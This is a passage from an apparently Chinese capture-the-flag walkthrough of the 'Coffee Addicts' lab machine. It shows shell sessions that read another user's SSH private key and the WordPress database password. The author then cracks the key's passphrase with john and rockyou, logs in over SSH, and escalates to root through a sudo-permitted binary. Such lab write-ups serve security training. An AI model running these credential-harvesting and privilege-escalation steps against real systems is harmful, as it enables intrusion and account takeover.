drwx------ 2 gus  gus  4096 Apr  6  2021 .cache
drwx------ 3 gus  gus  4096 Apr  6  2021 .gnupg
drwxrwxr-x 3 gus  gus  4096 Apr  6  2021 .local
-rw-r--r-- 1 gus  gus   807 Apr  6  2021 .profile
-rw-r--r-- 1 gus  gus     0 Apr  6  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 gus  gus   181 Apr  6  2021 readme.txt
-rw-rw-r-- 1 gus  gus    25 Apr  6  2021 user.txt
www-data@CoffeeAdicts:/home/gus$ cd /
cd /
www-data@CoffeeAdicts:/$ cd /home/badbyte
cd /home/badbyte
www-data@CoffeeAdicts:/home/badbyte$ ls -al
ls -al
total 40
drwxr-xr-x 5 badbyte badbyte 4096 Apr 15  2021 .
drwxr-xr-x 4 root    root    4096 Apr  6  2021 ..
-rw------- 1 badbyte badbyte  336 Apr 15  2021 .bash_history
-rw-r--r-- 1 badbyte badbyte  220 Apr  6  2021 .bash_logout
-rw-r--r-- 1 badbyte badbyte 3771 Apr  6  2021 .bashrc
drwx------ 2 badbyte badbyte 4096 Apr  6  2021 .cache
drwx------ 3 badbyte badbyte 4096 Apr  6  2021 .gnupg
-rw------- 1 root    root     101 Apr 15  2021 .mysql_history
-rw-r--r-- 1 badbyte badbyte  807 Apr  6  2021 .profile
drwxr-xr-x 2 root    root    4096 Apr  6  2021 .ssh
www-data@CoffeeAdicts:/home/badbyte$ cd .ssh
cd .ssh
www-data@CoffeeAdicts:/home/badbyte/.ssh$ ls -al
ls -al
total 12
drwxr-xr-x 2 root    root    4096 Apr  6  2021 .
drwxr-xr-x 5 badbyte badbyte 4096 Apr 15  2021 ..
-rw-r--r-- 1 root    root    1766 Apr  6  2021 id_rsa
www-data@CoffeeAdicts:/home/badbyte/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,62A318CC0E383648054CF4A211B5BC73

PaK8I9lUsr6gpOoNyTBkcg9NezPIKDfw8uuHWzUFOqtV8hkhgnx/8b9yjD5UQ2rX
nvOcdyVzhfpr293+48mmC1IHq3vMV3db9kqeIJ4LjG7A3yqjD6yw4Gy1NzibWrYT
......
RhjxPcPxNIaijkCTT4x5ZqkRSq3PRQwJ3O7ARKoXoLTScB8KSUhicmstC20ixRGx
svjCWYbFufc6ITOzNCCeM9gUS+WsPs5aJ+nfx5bj+ijSNSUH4UKpPFniHsVY2W8E
-----END RSA PRIVATE KEY-----

11.2.4、文件内容搜索(这个地方用处不大,上面信息足够提权)

  • 获取数据库信息
    • wordpressuser : 2a9798a9e678414e4aab71e2ba6a8dd9
www-data@CoffeeAdicts:/$ cd ~
cd ~
www-data@CoffeeAdicts:/var/www$ grep -ri -E 'DB_PASSWORD' *
grep -ri -E 'DB_PASSWORD' *
coffeeaddicts.thm/public_html/wordpress/wp-config.php:define( 'DB_PASSWORD', '2a9798a9e678414e4aab71e2ba6a8dd9' );
coffeeaddicts.thm/public_html/wordpress/wp-includes/load.php:   $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
coffeeaddicts.thm/public_html/wordpress/wp-admin/setup-config.php:              define( 'DB_PASSWORD', $pwd );
coffeeaddicts.thm/public_html/wordpress/wp-admin/setup-config.php:                              case 'DB_PASSWORD':
www-data@CoffeeAdicts:/var/www$ cat coffeeaddicts.thm/public_html/wordpress/wp-config.php
<ffeeaddicts.thm/public_html/wordpress/wp-config.php
......
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', '2a9798a9e678414e4aab71e2ba6a8dd9' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
......
www-data@CoffeeAdicts:/var/www$ grep -ri -E 'password' *
grep -ri -E 'password' *
......
coffeeaddicts.thm/public_html/wordpress/wp-admin/includes/class-ftp.php:                $this->_password="[email protected]";
......
  • 这里数据库就不看了,没啥东西
mysql -u wordpressuser -p2a9798a9e678414e4aab71e2ba6a8dd9

11.3、id_rsa 秘钥爆破

  • 获取用户密码:badbyte : password
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# vim id_rsa  
                                                                                                                                             
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh2john id_rsa > id_rsa.hash
                                                                                                                                             
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (id_rsa)     
1g 0:00:00:00 DONE (2023-11-29 08:30) 5.000g/s 160.0p/s 160.0c/s 160.0C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

12、SSH登录(其实直接爆破密码也可以,毕竟是弱密码)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-140-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Nov 29 04:20:04 AKST 2023

  System load:  0.02              Processes:             110
  Usage of /:   43.3% of 7.81GB   Users logged in:       0
  Memory usage: 56%               IP address for enp0s3: 192.168.56.44
  Swap usage:   0%


19 packages can be updated.
11 of these updates are security updates.
To see these additional updates run: apt list --upgradable


Last login: Thu Apr 15 15:56:55 2021 from 192.168.0.6
badbyte@CoffeeAdicts:~$

12.1、信息收集

badbyte@CoffeeAdicts:~$ history
    1  exit
    2  find /var/www/coffeeaddicts.thm/public_html/wordpress/ -type f -exec chmod 640 {} \;
    3  find /var/www/coffeeaddicts.thm/public_html/wordpress/ -type d -exec chmod 750 {} \;
    4  cd /var/www/coffeeaddicts.thm/public_html/
    5  ls
    6  ls -la
    7  cd wordpress/
    8  ls -la
    9  chmod 660 wp-config.php 
   10  rm wp-config-sample.php 
   11  mysql
   12  cd /opt/BadByte/
   13  sudo ./shell 
   14  history
badbyte@CoffeeAdicts:~$ ls -al /opt/BadByte/shell
-rwxr-xr-x 1 root root 13816 Apr  6  2021 /opt/BadByte/shell
badbyte@CoffeeAdicts:~$ sudo -l
[sudo] password for badbyte: 
Matching Defaults entries for badbyte on CoffeeAdicts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User badbyte may run the following commands on CoffeeAdicts:
    (root) /opt/BadByte/shell

13、提权

badbyte@CoffeeAdicts:~$ sudo /opt/BadByte/shell
BadByte # SHELL=/bin/bash script -q /dev/null
root@CoffeeAdicts:~# cd /root
root@CoffeeAdicts:/root# ls -al
total 36
drwx------  3 root root 4096 Apr  6  2021 .
drwxr-xr-x 23 root root 4096 Apr  6  2021 ..
-rw-------  1 root root 1071 Apr  6  2021 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Apr  6  2021 .local
-rw-------  1 root root  142 Apr  6  2021 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   20 Apr  6  2021 .python_history
-rw-r--r--  1 root root   25 Apr  6  2021 root.txt
root@CoffeeAdicts:/root# cat root.txt
THM{im_the_shell_master}

标签:bin,Coffee,20210520,www,Addicts,gus,coffeeaddicts,usr,root
From: https://www.cnblogs.com/NGC-2237/p/17866158.html

相关文章

  • Balance Addicts 题解
    BalanceAddicts题目大意给定序列\(a\),求有多少种合法的划分方案。定义一种划分方案是合法的当且仅当划分出的各段序列的和构成回文序列。思路分析一种不太一样的做法。我们先对\(a\)做一遍前缀和,得到\(s\)。观察各段序列的和形式:\[s_{p_1},s_{p_2}-s_{p_1},s_{p_3}......
  • 题解 Gym 104531D【Coffee】
    2022SYSUSchoolContest题目不想翻译了,自己看能看懂。problamThegirlsofHTTlikedrinkingtea.Butoneday,theywantedachangeanddecidedtotrycoffeeinthenext\(n\)days.NowMugi,whoalwaysprovidesfoodanddrinksforHTT,willgototheshopto......
  • CF1738C_EvenNumberAddicts
    CF1738CEvenNumberAddicts考虑综合只跟每个数的奇偶性有关,就先统计奇数个数及偶数个数。有DP和数学分类讨论两种方法。具体看题解吧:https://www.luogu.com.cn/problem/solution/CF1738C数学dp......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • CoffeeScript教程_编程入门自学教程_菜鸟教程-免费教程分享
    教程简介CoffeeScript是一种相对较新的语言,为开发人员提供了不再有JavaScript缺陷的令人期待的方案。利用CoffeeScript,开发人员即可使用一种轻量级、直观的语言完成编码工作,这种语言就像是Ruby和Python的混合体。对于兼容浏览器的Web应用程序,CoffeeScript将编译为Jav......
  • 「解题报告」CF1738H Palindrome Addicts
    神秘回文串题。首先容易发现要求的是区间本质不同回文串个数,所以直接上论文做法即可。容易想到增量构建回文自动机,假如现在建出了\([1,r]\)的PAM,考虑有多少回文串出现在了\([l,r]\)内。考虑记录每个回文串的最后一次出现位置\(last_p\),那么这个串的左端点就是\(last_p......
  • (博弈论)Even Number Addicts
    Alice和Bob正在一个序列 ai​ 上玩游戏,Alice先手,轮流玩。每一轮当前玩家可以取走序列中任意一个数,直到取完。如果最后Ailce取走的数的和为偶数,则Ailce赢,否则Bob赢。保证每个人用最优策略玩。对于每组数据,输出赢家。输入输出样例输入#1复制4313541357......
  • CF1738E Balance Addicts
    个人思路:\(sum_i\)表示前\(i\)个数的前缀和,推一下式子可知是要选若干对\(l_i,r_i\),使得\(l_1<l_2<\dots<l_k\ler_k<\dots<r_2<r_1\)且\(sum_{l_i}+......
  • CF1738F Connectivity Addicts
    CF1738FConnectivityAddicts给定\(n\)个点的度数,你需要在\(n\)次询问内给出一种涂色方案,使得每个颜色都满足\(s_c\leqn_c^2\),其中\(s_c\)表示所有点的度数和,......
  • 1738C-Even Number Addicts - dp, games, greedy
      voidsolve(){intn;cin>>n;intodd=0,even=0;for(inti=0;i<n;i++){inta;cin>>a;if(a&1)odd++;elseeven+......